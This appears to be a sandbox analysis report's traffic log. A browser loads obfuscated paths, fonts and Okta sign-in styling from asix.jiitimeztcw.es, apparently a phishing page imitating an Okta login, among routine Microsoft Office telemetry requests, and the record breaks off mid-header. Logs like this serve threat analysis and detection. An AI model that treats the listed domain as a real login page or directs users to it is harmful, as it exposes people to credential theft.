              Source: global trafficHTTP traffic detected: GET /kftlQ2CCmrYV0SEFOHODUQ2vyTVaUvDylRs8D2cZLwDFhdq3gGfq HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlRwd0c0U0RoTkU2ZktpbGVtYTVic3c9PSIsInZhbHVlIjoiNGp3akREUWd6TW45eHc3YW9jSnVVeG04Rkx4dXh2L3BZcmxrcDJMNkNqZXFNODdjMUkzY29TcG9DeDQwMlY5TmpxVFhFNmxRdC82bnQrWGlVTWhqVFE1Q0hXZXhuZW5tZVFlbVEvcG9yRGQ3N2dvdHJjYnBjZG1jcUMwVy9TY1MiLCJtYWMiOiIzMjYxYzJmOGI2NjNjYTVhZGU5NmRkYWRlNjc1ZjJhZGI5MjE5MWE1YWVkZjc1NzlmOWE5MTE5ZmMxNjk0YWJmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IndKdXp0TzVpcmduTEVNR2daSmhSU0E9PSIsInZhbHVlIjoiQmJaVGZ5eWxiUjRIUURyRVdnS2FWOS9JbFdsaFlhUk5iUStqd2w2dkxINEhTdllQOVZKY3lic0h5ZUxrTzhFMXo1Mk5BNWVnaFpBQlV0OC9Db3R1NDNDQWp2MFUzWnNTYkYyWWoxTmtQc1hHakM5WEl4dVpDTGsyYVgxcFFkY0YiLCJtYWMiOiI5NGRkNDQyMDEyMjNmZjczZmRlMzhmOTI1ODgwNTJmMjcwZjA5NTRlMzQyNjdkMjBkY2E3NDA5OTViYTRmN2E5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRM HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://asix.jiitimeztcw.es/ERcPqD/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlRwd0c0U0RoTkU2ZktpbGVtYTVic3c9PSIsInZhbHVlIjoiNGp3akREUWd6TW45eHc3YW9jSnVVeG04Rkx4dXh2L3BZcmxrcDJMNkNqZXFNODdjMUkzY29TcG9DeDQwMlY5TmpxVFhFNmxRdC82bnQrWGlVTWhqVFE1Q0hXZXhuZW5tZVFlbVEvcG9yRGQ3N2dvdHJjYnBjZG1jcUMwVy9TY1MiLCJtYWMiOiIzMjYxYzJmOGI2NjNjYTVhZGU5NmRkYWRlNjc1ZjJhZGI5MjE5MWE1YWVkZjc1NzlmOWE5MTE5ZmMxNjk0YWJmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IndKdXp0TzVpcmduTEVNR2daSmhSU0E9PSIsInZhbHVlIjoiQmJaVGZ5eWxiUjRIUURyRVdnS2FWOS9JbFdsaFlhUk5iUStqd2w2dkxINEhTdllQOVZKY3lic0h5ZUxrTzhFMXo1Mk5BNWVnaFpBQlV0OC9Db3R1NDNDQWp2MFUzWnNTYkYyWWoxTmtQc1hHakM5WEl4dVpDTGsyYVgxcFFkY0YiLCJtYWMiOiI5NGRkNDQyMDEyMjNmZjczZmRlMzhmOTI1ODgwNTJmMjcwZjA5NTRlMzQyNjdkMjBkY2E3NDA5OTViYTRmN2E5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /3461WfUGozdcdhoMoyq8920 HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImxUbmtlSXJoNE5CcG5Na0pOV2doTlE9PSIsInZhbHVlIjoiTmdNQ002MVVWN0JOakoyZ2NCa1d0UWh4UFpYbzZCc1BqbHFQTEVsUjNCSzZqdEE0NXVScjc3bmt0M0d2blY2dlhNQWRqWHFSWEVrVXMwNnFWays3dVgzcDlGK0FDeFZXYm1CNzZ5azRiM3JQenRTMis3d3N4U096NFhHUUwyam0iLCJtYWMiOiJiNTdhMTY2YTVjNzM3ZjY1ZjAwNTZmNmM0Y2VhOTY4YWUzY2MzYzlmYzM2OWE3M2M1MjU4MTEzOTJlNjI2N2E1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJzTzlXQXVDdG9FYlJzTGhlYnZ3dmc9PSIsInZhbHVlIjoiblRPb2t4Z2ZCMFFpVW51ZGVudE9mSU8rV0s2VWJIWWdJd1ZzcitraCtoc0VrUldZSmM1RFVaUm9vYy9BeG5TaFVSOUd3UzNFMnVYd1JyYWVJZGhRTHJoZzE3enAxRG9Ja3k0OXNrajZBU3ZEMjJNSFRya1REMStHZmE5WlhObzMiLCJtYWMiOiIyZTk2NzcyNzFiZTk0ZTE5MGJhYzNmY2Y4NTgwNmI0YzFmYzY3ZGNlZTkwZDQwYWY5NDhhODU1ZDMyNzliZDc0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /abENvvDzNJpbpqPZcd30 HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImxUbmtlSXJoNE5CcG5Na0pOV2doTlE9PSIsInZhbHVlIjoiTmdNQ002MVVWN0JOakoyZ2NCa1d0UWh4UFpYbzZCc1BqbHFQTEVsUjNCSzZqdEE0NXVScjc3bmt0M0d2blY2dlhNQWRqWHFSWEVrVXMwNnFWays3dVgzcDlGK0FDeFZXYm1CNzZ5azRiM3JQenRTMis3d3N4U096NFhHUUwyam0iLCJtYWMiOiJiNTdhMTY2YTVjNzM3ZjY1ZjAwNTZmNmM0Y2VhOTY4YWUzY2MzYzlmYzM2OWE3M2M1MjU4MTEzOTJlNjI2N2E1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJzTzlXQXVDdG9FYlJzTGhlYnZ3dmc9PSIsInZhbHVlIjoiblRPb2t4Z2ZCMFFpVW51ZGVudE9mSU8rV0s2VWJIWWdJd1ZzcitraCtoc0VrUldZSmM1RFVaUm9vYy9BeG5TaFVSOUd3UzNFMnVYd1JyYWVJZGhRTHJoZzE3enAxRG9Ja3k0OXNrajZBU3ZEMjJNSFRya1REMStHZmE5WlhObzMiLCJtYWMiOiIyZTk2NzcyNzFiZTk0ZTE5MGJhYzNmY2Y4NTgwNmI0YzFmYzY3ZGNlZTkwZDQwYWY5NDhhODU1ZDMyNzliZDc0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff2 HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-aliveOrigin: https://asix.jiitimeztcw.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImxUbmtlSXJoNE5CcG5Na0pOV2doTlE9PSIsInZhbHVlIjoiTmdNQ002MVVWN0JOakoyZ2NCa1d0UWh4UFpYbzZCc1BqbHFQTEVsUjNCSzZqdEE0NXVScjc3bmt0M0d2blY2dlhNQWRqWHFSWEVrVXMwNnFWays3dVgzcDlGK0FDeFZXYm1CNzZ5azRiM3JQenRTMis3d3N4U096NFhHUUwyam0iLCJtYWMiOiJiNTdhMTY2YTVjNzM3ZjY1ZjAwNTZmNmM0Y2VhOTY4YWUzY2MzYzlmYzM2OWE3M2M1MjU4MTEzOTJlNjI2N2E1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJzTzlXQXVDdG9FYlJzTGhlYnZ3dmc9PSIsInZhbHVlIjoiblRPb2t4Z2ZCMFFpVW51ZGVudE9mSU8rV0s2VWJIWWdJd1ZzcitraCtoc0VrUldZSmM1RFVaUm9vYy9BeG5TaFVSOUd3UzNFMnVYd1JyYWVJZGhRTHJoZzE3enAxRG9Ja3k0OXNrajZBU3ZEMjJNSFRya1REMStHZmE5WlhObzMiLCJtYWMiOiIyZTk2NzcyNzFiZTk0ZTE5MGJhYzNmY2Y4NTgwNmI0YzFmYzY3ZGNlZTkwZDQwYWY5NDhhODU1ZDMyNzliZDc0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-aliveOrigin: https://asix.jiitimeztcw.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImxUbmtlSXJoNE5CcG5Na0pOV2doTlE9PSIsInZhbHVlIjoiTmdNQ002MVVWN0JOakoyZ2NCa1d0UWh4UFpYbzZCc1BqbHFQTEVsUjNCSzZqdEE0NXVScjc3bmt0M0d2blY2dlhNQWRqWHFSWEVrVXMwNnFWays3dVgzcDlGK0FDeFZXYm1CNzZ5azRiM3JQenRTMis3d3N4U096NFhHUUwyam0iLCJtYWMiOiJiNTdhMTY2YTVjNzM3ZjY1ZjAwNTZmNmM0Y2VhOTY4YWUzY2MzYzlmYzM2OWE3M2M1MjU4MTEzOTJlNjI2N2E1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJzTzlXQXVDdG9FYlJzTGhlYnZ3dmc9PSIsInZhbHVlIjoiblRPb2t4Z2ZCMFFpVW51ZGVudE9mSU8rV0s2VWJIWWdJd1ZzcitraCtoc0VrUldZSmM1RFVaUm9vYy9BeG5TaFVSOUd3UzNFMnVYd1JyYWVJZGhRTHJoZzE3enAxRG9Ja3k0OXNrajZBU3ZEMjJNSFRya1REMStHZmE5WlhObzMiLCJtYWMiOiIyZTk2NzcyNzFiZTk0ZTE5MGJhYzNmY2Y4NTgwNmI0YzFmYzY3ZGNlZTkwZDQwYWY5NDhhODU1ZDMyNzliZDc0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff2 HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-aliveOrigin: https://asix.jiitimeztcw.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImxUbmtlSXJoNE5CcG5Na0pOV2doTlE9PSIsInZhbHVlIjoiTmdNQ002MVVWN0JOakoyZ2NCa1d0UWh4UFpYbzZCc1BqbHFQTEVsUjNCSzZqdEE0NXVScjc3bmt0M0d2blY2dlhNQWRqWHFSWEVrVXMwNnFWays3dVgzcDlGK0FDeFZXYm1CNzZ5azRiM3JQenRTMis3d3N4U096NFhHUUwyam0iLCJtYWMiOiJiNTdhMTY2YTVjNzM3ZjY1ZjAwNTZmNmM0Y2VhOTY4YWUzY2MzYzlmYzM2OWE3M2M1MjU4MTEzOTJlNjI2N2E1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJzTzlXQXVDdG9FYlJzTGhlYnZ3dmc9PSIsInZhbHVlIjoiblRPb2t4Z2ZCMFFpVW51ZGVudE9mSU8rV0s2VWJIWWdJd1ZzcitraCtoc0VrUldZSmM1RFVaUm9vYy9BeG5TaFVSOUd3UzNFMnVYd1JyYWVJZGhRTHJoZzE3enAxRG9Ja3k0OXNrajZBU3ZEMjJNSFRya1REMStHZmE5WlhObzMiLCJtYWMiOiIyZTk2NzcyNzFiZTk0ZTE5MGJhYzNmY2Y4NTgwNmI0YzFmYzY3ZGNlZTkwZDQwYWY5NDhhODU1ZDMyNzliZDc0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-aliveOrigin: https://asix.jiitimeztcw.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImxUbmtlSXJoNE5CcG5Na0pOV2doTlE9PSIsInZhbHVlIjoiTmdNQ002MVVWN0JOakoyZ2NCa1d0UWh4UFpYbzZCc1BqbHFQTEVsUjNCSzZqdEE0NXVScjc3bmt0M0d2blY2dlhNQWRqWHFSWEVrVXMwNnFWays3dVgzcDlGK0FDeFZXYm1CNzZ5azRiM3JQenRTMis3d3N4U096NFhHUUwyam0iLCJtYWMiOiJiNTdhMTY2YTVjNzM3ZjY1ZjAwNTZmNmM0Y2VhOTY4YWUzY2MzYzlmYzM2OWE3M2M1MjU4MTEzOTJlNjI2N2E1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJzTzlXQXVDdG9FYlJzTGhlYnZ3dmc9PSIsInZhbHVlIjoiblRPb2t4Z2ZCMFFpVW51ZGVudE9mSU8rV0s2VWJIWWdJd1ZzcitraCtoc0VrUldZSmM1RFVaUm9vYy9BeG5TaFVSOUd3UzNFMnVYd1JyYWVJZGhRTHJoZzE3enAxRG9Ja3k0OXNrajZBU3ZEMjJNSFRya1REMStHZmE5WlhObzMiLCJtYWMiOiIyZTk2NzcyNzFiZTk0ZTE5MGJhYzNmY2Y4NTgwNmI0YzFmYzY3ZGNlZTkwZDQwYWY5NDhhODU1ZDMyNzliZDc0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://asix.jiitimeztcw.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://asix.jiitimeztcw.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://asix.jiitimeztcw.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /GDSherpa-vf.woff2 HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-aliveOrigin: https://asix.jiitimeztcw.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImxUbmtlSXJoNE5CcG5Na0pOV2doTlE9PSIsInZhbHVlIjoiTmdNQ002MVVWN0JOakoyZ2NCa1d0UWh4UFpYbzZCc1BqbHFQTEVsUjNCSzZqdEE0NXVScjc3bmt0M0d2blY2dlhNQWRqWHFSWEVrVXMwNnFWays3dVgzcDlGK0FDeFZXYm1CNzZ5azRiM3JQenRTMis3d3N4U096NFhHUUwyam0iLCJtYWMiOiJiNTdhMTY2YTVjNzM3ZjY1ZjAwNTZmNmM0Y2VhOTY4YWUzY2MzYzlmYzM2OWE3M2M1MjU4MTEzOTJlNjI2N2E1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJzTzlXQXVDdG9FYlJzTGhlYnZ3dmc9PSIsInZhbHVlIjoiblRPb2t4Z2ZCMFFpVW51ZGVudE9mSU8rV0s2VWJIWWdJd1ZzcitraCtoc0VrUldZSmM1RFVaUm9vYy9BeG5TaFVSOUd3UzNFMnVYd1JyYWVJZGhRTHJoZzE3enAxRG9Ja3k0OXNrajZBU3ZEMjJNSFRya1REMStHZmE5WlhObzMiLCJtYWMiOiIyZTk2NzcyNzFiZTk0ZTE5MGJhYzNmY2Y4NTgwNmI0YzFmYzY3ZGNlZTkwZDQwYWY5NDhhODU1ZDMyNzliZDc0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /GDSherpa-vf2.woff2 HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-aliveOrigin: https://asix.jiitimeztcw.essec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImxUbmtlSXJoNE5CcG5Na0pOV2doTlE9PSIsInZhbHVlIjoiTmdNQ002MVVWN0JOakoyZ2NCa1d0UWh4UFpYbzZCc1BqbHFQTEVsUjNCSzZqdEE0NXVScjc3bmt0M0d2blY2dlhNQWRqWHFSWEVrVXMwNnFWays3dVgzcDlGK0FDeFZXYm1CNzZ5azRiM3JQenRTMis3d3N4U096NFhHUUwyam0iLCJtYWMiOiJiNTdhMTY2YTVjNzM3ZjY1ZjAwNTZmNmM0Y2VhOTY4YWUzY2MzYzlmYzM2OWE3M2M1MjU4MTEzOTJlNjI2N2E1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJzTzlXQXVDdG9FYlJzTGhlYnZ3dmc9PSIsInZhbHVlIjoiblRPb2t4Z2ZCMFFpVW51ZGVudE9mSU8rV0s2VWJIWWdJd1ZzcitraCtoc0VrUldZSmM1RFVaUm9vYy9BeG5TaFVSOUd3UzNFMnVYd1JyYWVJZGhRTHJoZzE3enAxRG9Ja3k0OXNrajZBU3ZEMjJNSFRya1REMStHZmE5WlhObzMiLCJtYWMiOiIyZTk2NzcyNzFiZTk0ZTE5MGJhYzNmY2Y4NTgwNmI0YzFmYzY3ZGNlZTkwZDQwYWY5NDhhODU1ZDMyNzliZDc0IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /34wP0TuMpggj2ErklBor18hEY89104 HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 